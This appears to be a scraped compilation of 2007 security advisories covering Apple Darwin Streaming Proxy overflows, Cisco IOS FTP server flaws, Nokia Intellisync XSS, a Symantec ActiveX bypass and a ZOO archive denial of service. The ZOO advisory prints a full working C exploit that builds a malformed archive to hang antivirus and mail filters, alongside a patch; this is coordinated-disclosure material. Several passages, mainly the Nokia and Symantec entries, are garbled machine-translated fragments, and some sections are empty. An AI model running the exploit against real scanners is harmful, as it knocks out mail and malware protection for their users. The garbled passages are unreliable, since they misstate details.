Multiple stack-based buffer overflows in the is_command function in proxy.c in Apple Darwin Streaming Proxy, when using Darwin Streaming Server before 5.5.5, allow remote attackers to execute arbitrary code via a long (1) cmd or (2) server value in an RTSP request. An attacker can exploit these issues to execute arbitrary code with superuser privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial of service. These issues affect versions prior to 5.5.5. ---------------------------------------------------------------------- Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure. Join the FREE BETA test of the Network Software Inspector (NSI)! http://secunia.com/network_software_inspector/ The NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. SOLUTION: Update to version 5.5.5. http://developer.apple.com/opensource/server/streaming/index.html PROVIDED AND/OR DISCOVERED BY: An anonymous person, reported via iDefense Labs. ORIGINAL ADVISORY: Apple: http://docs.info.apple.com/article.html?artnum=305495 iDefense Labs: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=533 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Apple Darwin Streaming Proxy Multiple Vulnerabilities iDefense Security Advisory 05.10.07 http://labs.idefense.com/intelligence/vulnerabilities/ May 10, 2007 I. BACKGROUND Darwin Streaming Server is a server technology that facilitates streaming of QuickTime data to clients across the Internet using the industry standard RTP and RTSP protocols. The Darwin Streaming Proxy is an application-specific proxy which would normally be run in a border zone or perimeter network. It is used to give client machines, within a protected network, access to streaming servers where the firewall blocks RTSP connections or RTP/UDP data flow. For more information, please visit the product website at via following URL. http://developer.apple.com/opensource/server/streaming/index.html II. Due to insufficient sanity checking, a stack-based buffer overflow could occur while trying to extract commands from the request buffer. The "is_command" function, located in proxy.c, lacks bounds checking when filling the 'cmd' and 'server' buffers. Additionally, a heap-based buffer overflow could occur while processing the "trackID" values contained within a "SETUP" request. If a request with more than 32 values is encountered, memory corruption will occur. III. No credentials are required for accessing the vulnerable code. The stack-based buffer overflow vulnerability relies on compiler optimizations. iDefense has verified the Darwin Streaming Proxy 4.1 binary release for Fedora Core is not vulnerable. The binary produced from a out-of-the-box compile on Fedora was confirmed vulnerable. IV. DETECTION iDefense has confirmed the existence of these vulnerabilities in Darwin Streaming Server 5.5.4 and Darwin Streaming Proxy 4.1. V. WORKAROUND Employ firewalls, access control lists or other TCP/UDP restriction mechanisms to limit access to vulnerable systems and services. VI. VENDOR RESPONSE Apple has addressed this vulnerability by releasing version 5.5.5 of Darwin Streaming Server. More information can be found from Apple's Security Update page or the Darwin Streaming Server advisory page at the respective URLs below. http://docs.info.apple.com/article.html?artnum=61798 http://docs.info.apple.com/article.html?artnum=305495 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-0748 to the heap-based buffer overflow and CVE-2007-0749 to stack-based buffer overflow. These names are a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 04/09/2007 Initial vendor notification 04/09/2007 Initial vendor response 05/10/2007 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright \xa9 2007 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice@idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

Heap-based buffer overflow in Apple Darwin Streaming Proxy, when using Darwin Streaming Server before 5.5.5, allows remote attackers to execute arbitrary code via multiple trackID values in a SETUP RTSP request. An attacker can exploit these issues to execute arbitrary code with superuser privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial of service. These issues affect versions prior to 5.5.5. ---------------------------------------------------------------------- Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure. Join the FREE BETA test of the Network Software Inspector (NSI)! http://secunia.com/network_software_inspector/ The NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. SOLUTION: Update to version 5.5.5. http://developer.apple.com/opensource/server/streaming/index.html PROVIDED AND/OR DISCOVERED BY: An anonymous person, reported via iDefense Labs. ORIGINAL ADVISORY: Apple: http://docs.info.apple.com/article.html?artnum=305495 iDefense Labs: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=533 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . BACKGROUND Darwin Streaming Server is a server technology that facilitates streaming of QuickTime data to clients across the Internet using the industry standard RTP and RTSP protocols. The Darwin Streaming Proxy is an application-specific proxy which would normally be run in a border zone or perimeter network. It is used to give client machines, within a protected network, access to streaming servers where the firewall blocks RTSP connections or RTP/UDP data flow. For more information, please visit the product website at via following URL. http://developer.apple.com/opensource/server/streaming/index.html II. Due to insufficient sanity checking, a stack-based buffer overflow could occur while trying to extract commands from the request buffer. The "is_command" function, located in proxy.c, lacks bounds checking when filling the 'cmd' and 'server' buffers. Additionally, a heap-based buffer overflow could occur while processing the "trackID" values contained within a "SETUP" request. If a request with more than 32 values is encountered, memory corruption will occur. III. No credentials are required for accessing the vulnerable code. The stack-based buffer overflow vulnerability relies on compiler optimizations. iDefense has verified the Darwin Streaming Proxy 4.1 binary release for Fedora Core is not vulnerable. The binary produced from a out-of-the-box compile on Fedora was confirmed vulnerable. IV. V. WORKAROUND Employ firewalls, access control lists or other TCP/UDP restriction mechanisms to limit access to vulnerable systems and services. VI. More information can be found from Apple's Security Update page or the Darwin Streaming Server advisory page at the respective URLs below. http://docs.info.apple.com/article.html?artnum=61798 http://docs.info.apple.com/article.html?artnum=305495 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-0748 to the heap-based buffer overflow and CVE-2007-0749 to stack-based buffer overflow. These names are a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 04/09/2007 Initial vendor notification 04/09/2007 Initial vendor response 05/10/2007 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright \xa9 2007 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice@idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

The FTP Server in Cisco IOS 11.3 through 12.4 does not properly check user authorization, which allows remote attackers to execute arbitrary code, and have other impact including reading startup-config, as demonstrated by a crafted MKD command that involves access to a VTY device and overflows a buffer, aka bug ID CSCek55259. Cisco IOS FTP Server is prone to multiple vulnerabilities including a denial-of-service issue and an authentication-bypass issue. Attackers can exploit these issues to deny service to legitimate users, gain unauthorized access to an affected device, or execute arbitrary code. Only IOS devices that have the FTP Server feature enabled are vulnerable; this feature is disabled by default. Cisco IOS is the operating system used by Cisco networking equipment. ---------------------------------------------------------------------- Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure. Join the FREE BETA test of the Network Software Inspector (NSI)! http://secunia.com/network_software_inspector/ The NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. ---------------------------------------------------------------------- TITLE: Cisco IOS FTP Server Multiple Vulnerabilities SECUNIA ADVISORY ID: SA25199 VERIFY ADVISORY: http://secunia.com/advisories/25199/ CRITICAL: Moderately critical IMPACT: Security Bypass, DoS, System access WHERE: >From remote OPERATING SYSTEM: Cisco IOS 12.x http://secunia.com/product/182/ Cisco IOS 11.x http://secunia.com/product/183/ DESCRIPTION: Some vulnerabilities have been reported in Cisco IOS, which can be exploited by malicious users and malicious people to bypass certain security restrictions, cause a DoS (Denial of Service), or potentially compromise a vulnerable system. 2) An unspecified error exists when transferring files via FTP, which can be exploited to cause a DoS (Denial of Service). Successful exploitation may allow an attacker to retrieve any file from an affected system (including startup-config), cause IOS to reload, and potentially execute arbitrary code, but requires that the FTP server is enabled, which is not the default setting. SOLUTION: The vendor has issued an update that removes the FTP server ability. As a workaround, it is possible to disable the FTP server by executing the following command in configuration mode: "no ftp-server enable". See vendor advisories for more details. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/en/US/products/products_applied_intelligence_response09186a00808399ea.html http://www.cisco.com/en/US/products/products_security_advisory09186a00808399d0.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Multiple cross-site scripting (XSS) vulnerabilities in Nokia Intellisync Mobile Suite 6.4.31.2, 6.6.0.107, and 6.6.2.2, possibly involving Novell Groupwise Mobile Server and Nokia Intellisync Wireless Email Express, allow remote attackers to inject arbitrary web script or HTML via the (1) username parameter to de/pda/dev_logon.asp and (2) multiple unspecified vectors in (a) usrmgr/registerAccount.asp, (b) de/create_account.asp, and other files. (1) de/pda/dev_logon.asp To username Parameters (2) usrmgr/registerAccount.asp , de/create_account.asp Etc. Routes in unspecified files . Reports indicate that these issues reside only in the bundled package; Nokia Intellisync Mobile Suite may not be affected on its own. Successful attacks may allow an attacker to obtain sensitive information and carry out denial-of-service and cross-site scripting attacks. ---------------------------------------------------------------------- Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure. Join the FREE BETA test of the Network Software Inspector (NSI)! http://secunia.com/network_software_inspector/ The NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. ---------------------------------------------------------------------- TITLE: Nokia Intellisync Mobile Suite Multiple Vulnerabilities SECUNIA ADVISORY ID: SA25212 VERIFY ADVISORY: http://secunia.com/advisories/25212/ CRITICAL: Moderately critical IMPACT: Cross Site Scripting, Exposure of system information, Exposure of sensitive information, DoS WHERE: >From remote SOFTWARE: Intellisync Mobile Suite http://secunia.com/product/3450/ DESCRIPTION: Johannes Greil has reported some vulnerabilities in Nokia's Intellisync Mobile Suite, which can be exploited by malicious people to gain knowledge of sensitive information, conduct cross-site scripting attacks, manipulate certain data, or cause a DoS (Denial of Service). 1) Missing authentication checks within certain ASP scripts (e.g. userList.asp, userStatusList.asp) can be exploited to modify or gain knowledge of certain user details, or to disable user accounts. 2) Certain input passed to de/pda/dev_logon.asp, usrmgr/registerAccount.asp, and de/create_account.asp is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. 3) An error within the bundled Apache Tomcat server can be exploited to disclose directory listings and script source codes. The vulnerabilities are reported in versions 6.4.31.2, 6.6.0.107, and 6.6.2.2 and is reported to partially affect Nokia Intellisync Wireless Email Express. Other versions may also be affected. SOLUTION: Upgrade to GMS 2. PROVIDED AND/OR DISCOVERED BY: Johannes Greil, SEC Consult ORIGINAL ADVISORY: http://www.sec-consult.com/289.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The Symantec NAVOPTS.DLL ActiveX control (aka Symantec.Norton.AntiVirus.NAVOptions) 12.2.0.13, as used in Norton AntiVirus, Internet Security, and System Works 2005 and 2006, is designed for use only in application-embedded web browsers, which allows remote attackers to "crash the control" via unspecified vectors related to content on a web site, and place Internet Explorer into a "defunct state" in which remote attackers can execute arbitrary code in addition to other Symantec ActiveX controls, regardless of whether they are marked safe for scripting. NOTE: this CVE was inadvertently used for an E-mail Auto-Protect issue, but that issue has been assigned CVE-2007-3771. (2) Internet Explorer The "defunc state" Regardless of the setting for whether scripting is safe or not. Symantec ActiveX An arbitrary code execution vulnerability exists with the control. This vulnerability E-mail Auto-Protect However, the problem is CVE-2007-3771 Has been assigned.A third party may be affected by: (1) " Crash control " There is a possibility that. (2) other Symantec ActiveX Arbitrary code, including controls, could be executed. An attacker may exploit this issue by enticing victims into opening a maliciously crafted HTML document. Successful exploits will allow attackers to execute arbitrary code in the context of the user visiting a malicious web page. Failed exploit attempts will likely result in denial-of-service conditions. Symantec Norton Internet Security 2006 COM Object Security ByPass Vulnerability iDefense Security Advisory 05.09.07 http://labs.idefense.com/intelligence/vulnerabilities/ May 09, 2007 I. BACKGROUND Norton Internet Security 2006 is a comprehensive system security suite that offers protection from spyware, viruses, identity theft, spam, and malicious network traffic. More information can be found on the vendors site at the following URL. http://www.symantec.com/home_homeoffice/products/overview.jsp?pcid=is&pvid=nis2006 II. When this control is loaded in a standard browser window, it throws an error during initialization which leaves the browser in a defunct state. After the error dialog displays, other Symantec ActiveX Controls can be created without error even if they are not marked as safe for scripting. This can lead to remote code execution if the unsafe controls contain exploitable methods. III. IV. DETECTION iDefense confirmed the existence of this vulnerability within version 12.2.0.13 of NavOpts.dll as distributed with Norton Internet Security 2006. Prior versions are suspected to be vulnerable. V. Although this will prevent potential exploitation, it may also negatively impact the functionality of the application. VI. VENDOR RESPONSE Symantec has addressed this vulnerability with a software update. The update is available via their LiveUpdate channels. For more information, consult their advisory at the following URL. http://www.symantec.com/avcenter/security/Content/2007.05.09.html VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2006-3456 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 12/13/2006 Initial vendor notification 12/13/2006 Initial vendor response 05/09/2007 Coordinated public disclosure IX. CREDIT This vulnerability was reported to iDefense by Peter Vreugdenhil. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright \xa9 2007 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice@idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. ---------------------------------------------------------------------- Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure. Join the FREE BETA test of the Network Software Inspector (NSI)! http://secunia.com/network_software_inspector/ The NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. This can be exploited to e.g. Set the kill-bit for the affected ActiveX control. PROVIDED AND/OR DISCOVERED BY: Discovered by Peter Vreugdenhil and reported via iDefense Labs. ORIGINAL ADVISORY: Symantec: http://www.symantec.com/avcenter/security/Content/2007.05.09.html iDefense Labs: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=529 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The IOS FTP Server in Cisco IOS 11.3 through 12.4 allows remote authenticated users to cause a denial of service (IOS reload) via unspecified vectors involving transferring files (aka bug ID CSCse29244). Cisco IOS FTP Server is prone to multiple vulnerabilities including a denial-of-service issue and an authentication-bypass issue. Attackers can exploit these issues to deny service to legitimate users, gain unauthorized access to an affected device, or execute arbitrary code. Only IOS devices that have the FTP Server feature enabled are vulnerable; this feature is disabled by default. Cisco IOS is the operating system used by Cisco networking equipment. ---------------------------------------------------------------------- Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure. Join the FREE BETA test of the Network Software Inspector (NSI)! http://secunia.com/network_software_inspector/ The NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. 1) An unspecified error exists in the IOS FTP server when verifying user credentials, which can be exploited to bypass user authentication. Successful exploitation may allow an attacker to retrieve any file from an affected system (including startup-config), cause IOS to reload, and potentially execute arbitrary code, but requires that the FTP server is enabled, which is not the default setting. SOLUTION: The vendor has issued an update that removes the FTP server ability. As a workaround, it is possible to disable the FTP server by executing the following command in configuration mode: "no ftp-server enable". See vendor advisories for more details. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/en/US/products/products_applied_intelligence_response09186a00808399ea.html http://www.cisco.com/en/US/products/products_security_advisory09186a00808399d0.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

unzoo.c, as used in multiple products including AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file. The Zoo compression algorithm is prone to a remote denial-of-service vulnerability. This issue arises when applications implementing the Zoo algorithm process certain malformed archives. A successful attack can exhaust system resources and trigger a denial-of-service condition. This issue affects Zoo 2.10 and other applications implementing the vulnerable algorithm. Topic: Multiple vendors ZOO file decompression infinite loop DoS Announced: 2007-05-04 Credits: Jean-Sebastien Guay-Leroux Products: Multiple (see section III) Impact: DoS (99% CPU utilisation) CVE ID: CVE-2007-1669, CVE-2007-1670, CVE-2007-1671, CVE-2007-1672, CVE-2007-1673 I. BACKGROUND Zoo is a compression program and format developed by Rahul Dhesi in the mid 1980s. The format is based on the LZW compression algorithm and compressed files are identified by the .zoo file extension. II. The vulnerability lies in the algorithm used to locate the files inside the archive. Each file in a ZOO archive is identified by a direntry structure. Those structures are linked between themselves with a 'next' pointer. This pointer is in fact an offset from the beginning of the file, representing the next direntry structure. By specifying an already processed file, it's possible to process more than one time this same file. The ZOO parser will then enter an infinite loop condition. III. AFFECTED SOFTWARES o Barracuda Spam Firewall o Panda Software Antivirus o avast! antivirus o Avira AntiVir o zoo-2.10 o unzoo.c o WinAce o PicoZip IV. IMPACT If this attack is conducted against a vulnerable antivirus, the host system will have its CPU at 100% utilization and may have problems answering other requests. If this attack is conducted against an SMTP content filter running a vulnerable ZOO implementation, legitimate clients may be unable to send and receive email through this server. V. SOLUTION o Barracuda Spam Firewall - CVE-2007-1669: They fixed this problem in virusdef 2.0.6399 for firmware >= 3.4 and 2.0.6399o for firmware < 3.4 March 19th 2007. o Panda Software Antivirus - CVE-2007-1670: They fixed this problem April 2nd 2007. o avast! antivirus - CVE-2007-1672: They fixed this problem in version 4.7.981, April 14th 2007. o Avira AntiVir - CVE-2007-1671: They fixed this problem in avpack32.dll version 7.3.0.6 March 22th 2007. o zoo-2.10 - CVE-2007-1669: This software is not maintained anymore. A patch for version 2.10 is provided in section VII of this advisory because some SMTP content filters may still use this software. o unzoo.c - CVE-2007-1673: This software is not maintained anymore. No patch is provided for this software. o WinAce was contacted but no response was received from them. o PicoZip was contacted but no response was received from them. VI. PROOF OF CONCEPT Using the PIRANA framework version 0.3.3, available at http://www.guay-leroux.com , it is possible to test your SMTP server against this vulnerability. Alternatively, here is an exploit that will create a file that will trigger the infinite loop condition when it is processed. /* Exploit for the vulnerability: Multiple vendors ZOO file decompression infinite loop DoS coded by Jean-S\xe9bastien Guay-Leroux September 2006 */ #include <stdio.h> #include <stdlib.h> #include <string.h> // Structure of a ZOO header #define ZOO_HEADER_SIZE 0x0000002a #define ZH_TEXT 0 #define ZH_TAG 20 #define ZH_START_OFFSET 24 #define ZH_NEG_START_OFFSET 28 #define ZH_MAJ_VER 32 #define ZH_MIN_VER 33 #define ZH_ARC_HTYPE 34 #define ZH_ARC_COMMENT 35 #define ZH_ARC_COMMENT_LENGTH 39 #define ZH_VERSION_DATA 41 #define D_DIRENTRY_LENGTH 56 #define D_TAG 0 #define D_TYPE 4 #define D_PACKING_METHOD 5 #define D_NEXT_ENTRY 6 #define D_OFFSET 10 #define D_DATE 14 #define D_TIME 16 #define D_FILE_CRC 18 #define D_ORIGINAL_SIZE 20 #define D_SIZE_NOW 24 #define D_MAJ_VER 28 #define D_MIN_VER 29 #define D_DELETED 30 #define D_FILE_STRUCT 31 #define D_COMMENT_OFFSET 32 #define D_COMMENT_SIZE 36 #define D_FILENAME 38 #define D_VAR_DIR_LEN 51 #define D_TIMEZONE 53 #define D_DIR_CRC 54 #define D_NAMLEN ( D_DIRENTRY_LENGTH + 0 ) #define D_DIRLEN ( D_DIRENTRY_LENGTH + 1 ) #define D_LFILENAME ( D_DIRENTRY_LENGTH + 2 ) void put_byte (char *ptr, unsigned char data) { *ptr = data; } void put_word (char *ptr, unsigned short data) { put_byte (ptr, data); put_byte (ptr + 1, data >> 8); } void put_longword (char *ptr, unsigned long data) { put_byte (ptr, data); put_byte (ptr + 1, data >> 8); put_byte (ptr + 2, data >> 16); put_byte (ptr + 3, data >> 24); } FILE * open_file (char *filename) { FILE *fp; fp = fopen ( filename , "w" ); if (!fp) { perror ("Cant open file"); exit (1); } return fp; } void usage (char *progname) { printf ("\nTo use:\n"); printf ("%s <archive name>\n\n", progname); exit (1); } int main (int argc, char *argv[]) { FILE *fp; char *hdr = (char *) malloc (4096); char *filename = (char *) malloc (256); int written_bytes; int total_size; if ( argc != 2) { usage ( argv[0] ); } strncpy (filename, argv[1], 255); if (!hdr || !filename) { perror ("Error allocating memory"); exit (1); } memset (hdr, 0x00, 4096); // Build a ZOO header memcpy (hdr + ZH_TEXT, "ZOO 2.10 Archive.\032", 18); put_longword (hdr + ZH_TAG, 0xfdc4a7dc); put_longword (hdr + ZH_START_OFFSET, ZOO_HEADER_SIZE); put_longword (hdr + ZH_NEG_START_OFFSET, (ZOO_HEADER_SIZE) * -1); put_byte (hdr + ZH_MAJ_VER, 2); put_byte (hdr + ZH_MIN_VER, 0); put_byte (hdr + ZH_ARC_HTYPE, 1); put_longword (hdr + ZH_ARC_COMMENT, 0); put_word (hdr + ZH_ARC_COMMENT_LENGTH, 0); put_byte (hdr + ZH_VERSION_DATA, 3); // Build vulnerable direntry struct put_longword (hdr + ZOO_HEADER_SIZE + D_TAG, 0xfdc4a7dc); put_byte (hdr + ZOO_HEADER_SIZE + D_TYPE, 1); put_byte (hdr + ZOO_HEADER_SIZE + D_PACKING_METHOD, 0); put_longword (hdr + ZOO_HEADER_SIZE + D_NEXT_ENTRY, 0x2a); put_longword (hdr + ZOO_HEADER_SIZE + D_OFFSET, 0x71); put_word (hdr + ZOO_HEADER_SIZE + D_DATE, 0x3394); put_word (hdr + ZOO_HEADER_SIZE + D_TIME, 0x4650); put_word (hdr + ZOO_HEADER_SIZE + D_FILE_CRC, 0); put_longword (hdr + ZOO_HEADER_SIZE + D_ORIGINAL_SIZE, 0); put_longword (hdr + ZOO_HEADER_SIZE + D_SIZE_NOW, 0); put_byte (hdr + ZOO_HEADER_SIZE + D_MAJ_VER, 1); put_byte (hdr + ZOO_HEADER_SIZE + D_MIN_VER, 0); put_byte (hdr + ZOO_HEADER_SIZE + D_DELETED, 0); put_byte (hdr + ZOO_HEADER_SIZE + D_FILE_STRUCT, 0); put_longword (hdr + ZOO_HEADER_SIZE + D_COMMENT_OFFSET, 0); put_word (hdr + ZOO_HEADER_SIZE + D_COMMENT_SIZE, 0); memcpy (hdr + ZOO_HEADER_SIZE + D_FILENAME, "AAAAAAAA.AAA", 13); total_size = ZOO_HEADER_SIZE + 51; fp = open_file (filename); if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) { printf ("The file has been written\n"); } else { printf ("Cant write to the file\n"); exit (1); } fclose (fp); return 0; } VII. PATCH To fix this issue, ensure that the offset of the next file to process is always greater than the one you are currently processing. This will guarantee the fact that it's not possible to process the same files over and over again. Here is a patch for the software zoo version 2.10 distributed with many UNIX systems: diff -u zoo/zooext.c zoo-patched/zooext.c --- zoo/zooext.c 1991-07-11 15:08:00.000000000 -0400 +++ zoo-patched/zooext.c 2007-03-16 16:45:28.000000000 -0500 @@ -89,6 +89,7 @@ #endif struct direntry direntry; /* directory entry */ int first_dir = 1; /* first dir entry seen? */ +unsigned long zoo_pointer = 0; /* Track our position in the file */ static char extract_ver[] = "Zoo %d.%d is needed to extract %s.\n"; static char no_space[] = "Insufficient disk space to extract %s.\n"; @@ -169,6 +170,9 @@ exit_status = 1; } zooseek (zoo_file, zoo_header.zoo_start, 0); /* seek to where data begins */ + + /* Begin tracking our position in the file */ + zoo_pointer = zoo_header.zoo_start; } #ifndef PORTABLE @@ -597,6 +601,12 @@ } /* end if */ loop_again: + + /* Make sure we are not seeking to already processed data */ + if (next_ptr <= zoo_pointer) + prterror ('f', "ZOO chain structure is corrupted\n"); + zoo_pointer = next_ptr; + zooseek (zoo_file, next_ptr, 0); /* ..seek to next dir entry */ } /* end while */ diff -u zoo/zoolist.c zoo-patched/zoolist.c --- zoo/zoolist.c 1991-07-11 15:08:04.000000000 -0400 +++ zoo-patched/zoolist.c 2007-03-16 16:45:20.000000000 -0500 @@ -92,6 +92,7 @@ int show_mode = 0; /* show file protection */ #endif int first_dir = 1; /* if first direntry -- to adjust dat_ofs */ +unsigned long zoo_pointer = 0; /* Track our position in the file */ while (*option) { switch (*option) { @@ -211,6 +212,9 @@ show_acmt (&zoo_header, zoo_file, 0); /* show archive comment */ } + /* Begin tracking our position in the file */ + zoo_pointer = zoo_header.zoo_start; + /* Seek to the beginning of the first directory entry */ if (zooseek (zoo_file, zoo_header.zoo_start, 0) != 0) { ercount++; @@ -437,6 +441,11 @@ if (verb_list && !fast) show_comment (&direntry, zoo_file, 0, (char *) NULL); } /* end if (lots of conditions) */ + + /* Make sure we are not seeking to already processed data */ + if (direntry.next <= zoo_pointer) + prterror ('f', "ZOO chain structure is corrupted\n"); + zoo_pointer = direntry.next; /* ..seek to next dir entry */ zooseek (zoo_file, direntry.next, 0); VIII. CREDITS Jean-Sebastien Guay-Leroux found the bug and wrote the exploit for it. IX. REFERENCES 1. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1669 2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1670 3. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1671 4. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1672 5. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1673 X. HISTORY 2006-09-?? : Vulnerability is found 2007-03-19 : All vendors notified 2007-03-19 : Barracuda Networks provided a fix 2007-03-22 : Avira provided a fix 2007-04-02 : Panda Antivirus provided a fix 2007-04-14 : avast! antivirus provided a fix 2007-05-04 : Public disclosure

